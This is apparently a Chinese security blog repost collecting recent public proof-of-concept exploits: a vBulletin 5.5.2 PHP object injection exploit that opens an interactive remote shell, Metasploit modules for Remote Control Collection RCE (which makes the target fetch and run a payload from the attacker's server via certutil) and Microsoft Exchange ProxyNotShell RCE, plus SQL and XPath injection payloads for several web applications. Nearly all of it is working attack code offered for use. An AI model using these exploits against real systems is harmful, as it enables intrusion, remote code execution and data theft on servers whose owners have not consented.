免责声明
1、vBulletin 5.5.2 PHP 对象注入
/*
--------------------------------------------------------------
vBulletin <= 5.5.2 (movepm) PHP Object Injection Vulnerability
--------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://www.vbulletin.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerability Description:
User input passed through the "messageids" request parameter to /ajax/api/vb4_private/movepm is
not properly sanitized before being used in a call to the unserialize() PHP function. This can
be exploited by malicious users to inject arbitrary PHP objects into the application scope,
allowing them to carry out a variety of attacks, such as executing arbitrary PHP code.
[-] Technical writeup:
http://karmainsecurity.com/exploiting-an-nday-vbulletin-php-object-injection
*/
set_time_limit(0);
error_reporting(E_ERROR);
if (!extension_loaded("curl")) die("[+] cURL extension required!n");
print "+------------------------------------------------------------------+";
print "n| vBulletin <= 5.5.2 (movepm) PHP Object Injection Exploit by EgiX |";
print "n+------------------------------------------------------------------+n";
if ($argc != 4)
{
print "nUsage......: php $argv[0] <URL> <Username> <Password>n";
print "nExample....: php $argv[0] http://localhost/vb/ user passwd";
print "nExample....: php $argv[0] https://vbulletin.com/ evil hackernn";
die();
}
class googlelogin_vendor_autoload {} // fake class to include the autoloader
class GuzzleHttp_HandlerStack
{
private $handler, $stack;
function __construct($cmd)
{
$this->stack = [["system"]]; // the callback we want to execute
$this->handler = $cmd; // argument for the callback
}
}
class GuzzleHttp_Psr7_FnStream
{
function __construct($callback)
{
$this->_fn_close = $callback;
}
}
function make_popchain($cmd)
{
$pop = new GuzzleHttp_HandlerStack($cmd);
$pop = new GuzzleHttp_Psr7_FnStream([$pop, 'resolve']);
$chain = serialize([new googlelogin_vendor_autoload, $pop]);
$chain = str_replace(['s:', chr(0)], ['S:', '0'], $chain);
$chain = str_replace('GuzzleHttp_HandlerStack', 'GuzzleHttpHandlerStack', $chain);
$chain = str_replace('GuzzleHttp_Psr7_FnStream', 'GuzzleHttpPsr7FnStream', $chain);
$chain = str_replace('0GuzzleHttpHandlerStack', '0GuzzleHttp5CHandlerStack', $chain);
return $chain;
}
list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
print "[+] Logging in with username '{$user}' and password '{$pass}'n";
curl_setopt($ch, CURLOPT_URL, $url);
if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Session ID not found!n");
curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login");
curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}");
if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[+] Login failed!n");
print "[+] Logged-in! Retrieving security tokenn";
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, $sid);
if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[+] Security token not found!n");
$params = ["routestring" => "ajax/api/vb4_private/movepm",
"securitytoken" => $token[1],
"folderid" => 1];
print "[+] Launching shelln";
while(1)
{
print "nvb-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$params["messageids"] = make_popchain($cmd);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
preg_match('/(.*){"response":/s', curl_exec($ch), $m) ? print $m[1] : die("n[+] Exploit failed!n");
}
2、Remote Control Collection远程代码执行漏洞
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
prepend Msf::Exploit::Remote::AutoCheck
include Exploit::Remote::Udp
include Exploit::EXE # generate_payload_exe
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Remote Control Collection RCE',
'Description' => %q{
This module utilizes the Remote Control Server's, part
of the Remote Control Collection by Steppschuh, protocol
to deploy a payload and run it from the server. This module will only deploy
a payload if the server is set without a password (default).
Tested against 3.1.1.12, current at the time of module writing
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'H4rk3nz0' # edb, discovery
],
'References' => [
[ 'URL', 'http://remote-control-collection.com' ],
[ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/remote%20control%20collection/remote-control-collection-rce.py' ]
],
'Arch' => [ ARCH_X64, ARCH_X86 ],
'Platform' => 'win',
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' => [
['default', {}],
],
'DefaultOptions' => {
'PAYLOAD' => 'windows/shell/reverse_tcp',
'WfsDelay' => 5,
'Autocheck' => false
},
'DisclosureDate' => '2022-09-20',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]
}
)
)
register_options(
[
OptPort.new('RPORT', [true, 'Port Remote Mouse runs on', 1926]),
OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
OptString.new('PATH', [true, 'Where to stage payload for pull method', '%temp%\']),
OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),
]
)
end
def path
return datastore['PATH'] if datastore['PATH'].end_with? '\'
"#{datastore['PATH']}\"
end
def special_key_header
"x7fx15x02"
end
def key_header
"x7fx15x01"
end
def windows_key
udp_sock.put("#{special_key_header}x01x00x00x00xab") # key up
udp_sock.put("#{special_key_header}x00x00x00x00xab") # key down
sleep(datastore['SLEEP'])
end
def enter_key
udp_sock.put("#{special_key_header}x01x00x00x00x42")
sleep(datastore['SLEEP'])
end
def send_command(command)
command.each_char do |c|
udp_sock.put("#{key_header}#{c}")
sleep(datastore['SLEEP'] / 10)
end
enter_key
sleep(datastore['SLEEP'])
end
def check
@check_run = true
@check_success = false
upload_file
return Exploit::CheckCode::Vulnerable if @check_success
return Exploit::CheckCode::Safe
end
def on_request_uri(cli, _req)
@check_success = true
if @check_run # send a random file
p = Rex::Text.rand_text_alphanumeric(rand(8..17))
else
p = generate_payload_exe
end
send_response(cli, p)
print_good("Request received, sending #{p.length} bytes")
end
def upload_file
connect_udp
# send a space character to skip any screensaver
udp_sock.put("#{key_header} ")
print_status('Connecting and Sending Windows key')
windows_key
print_status('Opening command prompt')
send_command('cmd.exe')
filename = Rex::Text.rand_text_alphanumeric(rand(8..17))
filename << '.exe' unless @check_run
if @service_started.nil?
print_status('Starting up our web service...')
start_service('Path' => '/')
@service_started = true
end
get_file = "certutil.exe -urlcache -f http://#{srvhost_addr}:#{srvport}/ #{path}#{filename}"
send_command(get_file)
if @check_run.nil? || @check_run == true
send_command("del #{path}#{filename} && exit")
else
register_file_for_cleanup("#{path}#{filename}")
print_status('Executing payload')
send_command("#{path}#{filename} && exit")
end
disconnect_udp
end
def exploit
@check_run = false
upload_file
end
end
3、Concrete CMS 9.1.3 XPATH Injection
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
https://packetstormsecurity.com/files/170041/concretecms913-xpath.txt
4、Helmet Store Showroom 1.0 SQL 注入漏洞
# Exploit Title: Helmet Store Showroom 1.0 - authenticated SQL Injection
# Exploit Author: syad
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 + XAMPP 3.2.4
# CVE ID : N/A
# Description
# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.
import requests
import sys
import pyfiglet
sess = requests.Session()
proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}
def login1(ip,username,password):
x = "http://%s/hss/classes/Login.php?f=login" % ip
login = {'username':username, 'password':password}
r = sess.post(x, data=login, proxies=proxies)
#print(r.content)
def login(ip):
x = ("http://%s/hss/admin") % ip
r = sess.get(x,proxies=proxies)
if "Welcome to Helmet Store Showroom - PHP" in r.text:
print("--------------------------------------------")
print("[+] Success Login")
def detect_sql(ip):
x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip
r = sess.get(x,proxies=proxies)
if "You have an error in your SQL syntax" in r.text:
print("[+] Found SQL Error")
def time_based_sqli(ip):
x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip
r = sess.get(x,proxies=proxies)
print("[+] Time Based SQL Found")
print("[*]!!! Time To Report !!!")
if __name__ == "__main__":
result = pyfiglet.figlet_format("PWN")
print(result)
try:
ip = sys.argv[1].strip()
username = sys.argv[2].strip()
password = sys.argv[3].strip()
except IndexError:
print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])
print("[-] Example: %s 192.168.1.x" % sys.argv[0])
sys.exit(-1)
login1(ip,username,password)
login(ip)
detect_sql(ip)
time_based_sqli(ip)
5、Sanitization Management System 1.0 SQL注入漏洞
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: p=services/view_service&id=126664801' or '5968'='5975' OR
NOT 5461=5461 AND 'gEud'='gEud
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: p=services/view_service&id=126664801' or '5968'='5975' OR
(SELECT 5753 FROM(SELECT COUNT(*),CONCAT(0x7176707671,(SELECT
(ELT(5753=5753,1))),0x71767a7071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DEYy'='DEYy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=services/view_service&id=126664801' or '5968'='5975'
AND (SELECT 6369 FROM (SELECT(SLEEP(5)))Rnfu) AND 'PUfi'='PUfi
https://0day.today/exploit/38082
6、perfSONAR 4.4.5 跨站请求伪造(CVE-2022-41413)
https://packetstormsecurity.com/files/download/170070/CVE-2022-41413.tgz
7、perfSONAR 4.4.4 开放代理/中继(CVE-2022-41412)
https://packetstormsecurity.com/files/download/170069/CVE-2022-41412.tgz
8、Microsoft Exchange ProxyNotShell 远程代码执行(CVE-2022-41040 , CVE-2022-41082)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HTTP::Exchange
include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell
include Msf::Exploit::EXE
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft Exchange ProxyNotShell RCE',
'Description' => %q{
This module chains two vulnerabilities on Microsoft Exchange Server
that, when combined, allow an authenticated attacker to interact with
the Exchange Powershell backend (CVE-2022-41040), where a
deserialization flaw can be leveraged to obtain code execution
(CVE-2022-41082). This exploit only support Exchange Server 2019.
These vulnerabilities were patched in November 2022.
},
'Author' => [
'Orange Tsai', # Discovery of ProxyShell SSRF
'Spencer McIntyre', # Metasploit module
'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis
'Piotr Bazydło', # Vulnerability analysis
'Rich Warren', # EEMS bypass via ProxyNotRelay
'Soroush Dalili' # EEMS bypass
],
'References' => [
[ 'CVE', '2022-41040' ], # ssrf
[ 'CVE', '2022-41082' ], # rce
[ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],
[ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],
[ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],
[ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]
],
'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Platform' => ['windows'],
'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
'Privileged' => true,
'Targets' => [
[
'Windows Dropper',
{
'Platform' => 'windows',
'Arch' => [ARCH_X64, ARCH_X86],
'Type' => :windows_dropper
}
],
[
'Windows Command',
{
'Platform' => 'windows',
'Arch' => [ARCH_CMD],
'Type' => :windows_command
}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'AKA' => ['ProxyNotShell'],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
register_options([
OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])
])
register_advanced_options([
OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])
])
end
def check
@ssrf_email ||= Faker::Internet.email
res = send_http('GET', '/mapi/nspi/')
return CheckCode::Unknown if res.nil?
return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401
return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'
# actually run the powershell cmdlet and see if it works, this will fail if:
# * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)
# * the exchange emergency mitigation service M1 rule is in place
return CheckCode::Safe unless execute_powershell('Get-Mailbox')
CheckCode::Vulnerable
rescue Msf::Exploit::Failed => e
CheckCode::Safe(e.to_s)
end
def ibm037(string)
string.encode('IBM037').force_encoding('ASCII-8BIT')
end
def send_http(method, uri, opts = {})
opts[:authentication] = {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'preferred_auth' => 'NTLM'
}
if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'
uri = "/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}"
opts[:headers] = {
'X-Up-Devcap-Post-Charset' => 'IBM037',
# technique needs the "UP" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362
'User-Agent' => "UP #{datastore['UserAgent']}"
}
else
uri = "/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}"
end
super(method, uri, opts)
end
def exploit
# if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not
# work on Exchange Server 2016
if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)
vprint_status("Detected Exchange version: #{version}")
if version < Rex::Version.new('15.2')
fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')
end
end
@ssrf_email ||= Faker::Internet.email
case target['Type']
when :windows_command
vprint_status("Generated payload: #{payload.encoded}")
execute_command(payload.encoded)
when :windows_dropper
execute_cmdstager({ linemax: 7_500 })
end
end
def execute_command(cmd, _opts = {})
xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root
<ResourceDictionary
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:System="clr-namespace:System;assembly=mscorlib"
xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
<ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start">
<ObjectDataProvider.MethodParameters>
<System:String>cmd.exe</System:String>
<System:String>/c #{cmd.encode(xml: :text)}</System:String>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>
XAML
identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root
<Obj N="V" RefId="14">
<TN RefId="1">
<T>System.ServiceProcess.ServiceController</T>
<T>System.Object</T>
</TN>
<ToString>Object</ToString>
<Props>
<S N="Name">Type</S>
<Obj N="TargetTypeForDeserialization">
<TN RefId="1">
<T>System.Exception</T>
<T>System.Object</T>
</TN>
<MS>
<BA N="SerializationData">
#{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}
</BA>
</MS>
</Obj>
</Props>
<S>
<![CDATA[#{xaml}]]>
</S>
</Obj>
IDENTITY
execute_powershell('Get-Mailbox', args: [
{ name: '-Identity', value: identity }
])
end
end
class XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream
include Msf::Util::DotNetDeserialization
def self.generate
from_values([
Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),
Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(
class_info: Types::General::ClassInfo.new(
obj_id: 1,
name: 'System.UnitySerializationHolder',
member_names: %w[Data UnityType AssemblyName]
),
member_type_info: Types::General::MemberTypeInfo.new(
binary_type_enums: %i[String Primitive String],
additional_infos: [ 8 ]
),
member_values: [
Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
obj_id: 2,
string: 'System.Windows.Markup.XamlReader'
)),
4,
Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(
obj_id: 3,
string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'
))
]
),
Types::RecordValues::MessageEnd.new
])
end
end
原文始发于微信公众号(Hack All):【漏洞仓库】最近发布的Poc&Exp
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论